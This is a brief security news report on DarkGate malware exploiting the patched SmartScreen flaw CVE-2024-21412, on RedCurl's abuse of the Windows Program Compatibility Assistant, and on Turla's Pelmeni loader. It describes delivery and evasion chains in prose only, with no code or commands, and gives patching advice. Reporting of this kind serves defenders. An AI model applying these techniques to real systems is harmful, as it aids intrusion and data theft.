Windows Defender SmartScreen Vulnerability Exploited by DarkGate Malware

The DarkGate malware operation exploited a vulnerability in Windows Defender SmartScreen, allowing attackers to bypass security warnings and execute malicious activities, which has since been patched by Microsoft.

At a glance

• DarkGate malware exploiting patched Windows Defender SmartScreen vulnerability.
• Microsoft released a patch in mid-February to address the CVE-2024-21412 vulnerability.
• DarkGate operators using vulnerability for malicious activities, filling the gap left by QBot disruption
• RedCurl cybercrime group utilizing Program Compatibility Assistant for malicious commands.
• Recommendation to apply Microsoft’s February 2024 Patch Tuesday update to mitigate DarkGate risks

The details

A recent malware operation known as DarkGate has been exploiting a now-patched vulnerability in Windows Defender SmartScreen.

SmartScreen is a security feature in Windows that warns users about suspicious files.

The vulnerability, identified as CVE-2024-21412, allowed files to bypass security warnings, enabling attackers to create Windows Internet shortcut files to exploit the flaw.

Microsoft Patch

Microsoft addressed this issue in a patch released in mid-February.

The Water Hydra hacking group had previously taken advantage of this vulnerability as a zero-day exploit.

Now, DarkGate operators are using the same vulnerability to carry out their malicious activities.

DarkGate and Pikabot

DarkGate, along with Pikabot, has been filling the gap left by the disruption of the QBot malware.

The attack typically begins with a malicious email containing a PDF attachment with links that use open redirects from Google DDM services to bypass security checks.

Malicious MSI files are disguised as legitimate software, with the MSI installer executing the DarkGate malware payload.

This malware is capable of data theft, fetching additional payloads, key logging, and providing attackers with remote access.

The current campaign is using DarkGate version 6.1.7, which includes new features and updates to enhance operational tactics and evasion techniques.

To mitigate the risks associated with this DarkGate campaign, it is recommended to apply Microsoft’s February 2024 Patch Tuesday update.

Trend Micro has also published a list of indicators of compromise specific to this DarkGate campaign.

RedCurl Cybercrime Group

On a separate note, the Russian-speaking cybercrime group RedCurl has been utilizing the Program Compatibility Assistant (PCA) to carry out malicious commands.

The PCA Service (pcalua.exe) is a Windows service designed to address compatibility issues with older programs.

RedCurl, also known as Earth Kapre and Red Wolf, has been active since at least 2018 and has been involved in corporate cyber espionage attacks against entities in various countries.

In July 2023, F.A.C.C.T. disclosed that a major Russian bank and an Australian company were targeted by RedCurl.

The attack involves phishing emails with malicious attachments, cmd.exe, curl, and a loader (ms.dll or ps.dll). A malicious DLL file uses PCA to spawn a downloader process that establishes a connection with a remote server.

The attack also utilizes the Impacket open-source software for unauthorized command execution.

Connections to Earth Kapre are identified through overlaps in the command-and-control infrastructure.

To further evade detection within targeted networks, Earth Kapre employs sophisticated tactics.

The Russian nation-state group Turla has recently started using a new wrapper DLL called Pelmeni to deploy the Kazuar backdoor.

Pelmeni disguises itself as libraries related to various software to launch Kazuar through DLL side-loading.

Article X-ray